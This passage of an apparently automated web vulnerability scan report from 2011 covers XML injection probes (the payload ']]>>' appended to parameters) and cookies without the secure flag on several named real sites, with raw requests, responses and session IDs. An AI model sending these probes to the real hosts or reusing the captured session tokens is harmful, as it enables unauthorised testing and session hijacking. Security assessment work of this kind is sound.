Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...
<div class="content">
<form action="/content/the-davix-live-cd?destination=node%2F89" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

7. XML injection
There are 6 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


7.1. http://api.facebook.com/restserver.php [format parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The format parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the format parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F%22%5D&format=json]]>>&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Wed, 11 May 2011 17:53:11 -0700
Pragma:
X-FB-Rev: 377111
X-FB-Server: 10.42.16.39
X-Cnection: close
Date: Thu, 12 May 2011 00:51:11 GMT
Content-Length: 916

fb_sharepro_render('<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<links_getStats_response xmlns=\"http://api.facebook.com/1.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://api.facebook.com/1.0/ http://api.facebook.com/1.0/facebook.xsd\" list=\"true\">
...[SNIP]...

7.2. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://images.smartname.com
Path:   /smartname/images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname]]>>/images/favicon.ico HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:13 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.3. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://images.smartname.com
Path:   /smartname/images/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname/images]]>>/favicon.ico HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Date: Thu, 12 May 2011 00:43:15 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.4. http://images.smartname.com/smartname/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://images.smartname.com
Path:   /smartname/images/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smartname/images/favicon.ico]]>> HTTP/1.1
Host: images.smartname.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Cartoon: : aaimage1-new
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.20
Expires: Thu, 12 May 2011 00:43:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 00:43:16 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.5. http://mobilitypoint.westcon.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mobilitypoint.westcon.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: mobilitypoint.westcon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:11:56 GMT
Server: Apache/2.2.8 (EL)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1029

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

7.6. http://www.nanpa.org/forums/external.php [type parameter]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The type parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the type parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /forums/external.php?type=js]]>> HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:10 GMT
Server: Apache
Set-Cookie: vblastvisit=1305158650; expires=Fri, 11-May-2012 00:04:10 GMT; path=/
Set-Cookie: vblastactivity=0; expires=Fri, 11-May-2012 00:04:10 GMT; path=/
Cache-Control: max-age=1305160149
Pragma: private
X-UA-Compatible: IE=7
Expires: Thu, 12 May 2011 00:29:09 GMT
Last-Modified: Wed, 11 May 2011 23:29:09 GMT
ETag: "5ad4bc554cc5b569cc359626e1477d12"
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/xml; charset=ISO-8859-1
Content-Length: 30699

<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
   <channel>
       <title>NANPA - Natu
...[SNIP]...

8. SSL cookie without secure flag set
There are 15 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://catalyst.fastcatalog.net/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://catalyst.fastcatalog.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: catalyst.fastcatalog.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.catalysttelecom.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AD971C52BCD76B2912D285BABD89388E; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:11:13 GMT
Connection: Keep-Alive
Content-Length: 6220


   <!-- -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type"
...[SNIP]...

8.2. https://lnp.activationnow.com/lnp/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://lnp.activationnow.com
Path:   /lnp/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lnp/ HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-cache="set-cookie"
Date: Thu, 12 May 2011 00:50:19 GMT
Location: https://lnp.activationnow.com/lnp/jsp/logon/login.jsp;jsessionid=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395
Set-Cookie: JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 457

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://lnp.activationnow.com/lnp/j
...[SNIP]...

8.3. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/911_logo_trc.jpg.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/911_logo_trc.jpg.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=E67566A9FCA34838BD3C0F39C7667AF5; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"23480-1288968421251"
Last-Modified: Fri, 05 Nov 2010 14:47:01 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 23480

...[SNIP]...

8.4. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/Custom_HeadLogo.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/Custom_HeadLogo.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=278E65F15DE692F4A8E073513FF95433; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"4671-1288970193688"
Last-Modified: Fri, 05 Nov 2010 15:16:33 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 4671

...[SNIP]...

8.5. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-solutions.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-solutions.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8B4C97B2401F7908250BAE174F9BBA38; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"1990-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Content-Length: 1990
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

...[SNIP]...

8.6. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /custom/customimages/portal-browse-ticket.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /custom/customimages/portal-browse-ticket.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AD61B4917C0B442AD2D923ADADC2675A; Path=/custom
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
ETag: W/"2226-1280994282000"
Last-Modified: Thu, 05 Aug 2010 07:44:42 GMT
Content-Type: image/gif
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1
Content-Length: 2226

...[SNIP]...

8.7. https://support.connexon.com/images/favicon.ico

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/favicon.ico HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=607787AE9CA83B1C07389AEFC2EF256A; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:13 GMT; Path=/
ETag: W/"318-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Length: 318
Date: Thu, 12 May 2011 01:08:12 GMT
Server: Apache-Coyote/1.1

...[SNIP]...

8.8. https://support.connexon.com/images/spacer.gif

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/spacer.gif HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=3E33D7090110A52AF1A2EDAFA1C24EAD; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:10 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:10 GMT
ETag: W/"43-1282158794000"
Last-Modified: Wed, 18 Aug 2010 19:13:14 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 01:08:10 GMT
Server: Apache-Coyote/1.1


8.9. https://support.connexon.com/sd/SolutionsHome.sd

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /sd/SolutionsHome.sd

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sd/SolutionsHome.sd HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.911enable.com/login/index.php

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 13742


<html>
<link type="text/css" rel="stylesheet" href="../style/style.css?aa">
<link type="text/css" rel="stylesheet" href="../style/demo.css">
<link rel="SHORTCUT ICON" hre
...[SNIP]...

8.10. https://support.connexon.com/style/demo.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/demo.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/demo.css HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 404 /style/demo.css
Set-Cookie: JSESSIONID=CF1B4E8028A2944A1E644EE9D78DB960; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:09 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 997
Date: Thu, 12 May 2011 01:08:09 GMT
Server: Apache-Coyote/1.1

<html><head><title>Apache Tomcat/5.0.28 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

8.11. https://support.connexon.com/style/style.css

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.connexon.com
Path:   /style/style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/style.css?aa HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: PREV_CONTEXT_PATH=/sd

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=AF295E2F29DA2AF72D8D0F33050CAE08; Path=/
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=; Expires=Fri, 13-May-2011 01:08:12 GMT; Path=/
Expires: Mon, 16 May 2011 05:08:12 GMT
ETag: W/"320710-1282158796000"
Last-Modified: Wed, 18 Aug 2010 19:13:16 GMT
Content-Type: text/css
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:11 GMT
Server: Apache-Coyote/1.1
Content-Length: 320710

/* $Id: style.css,v 1.287 2010/06/11 07:36:28 vijay Exp $ */
@import url("htmlarea.css");
@import url("combo.css");
@import url("common.css");
@import url("menu.css");
@import url("cal_style.css");
...[SNIP]...

8.12. https://lnp.activationnow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413; LNP=pabetaptel15p-lnp

Response

HTTP/1.1 404 Not Found
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Connection: close
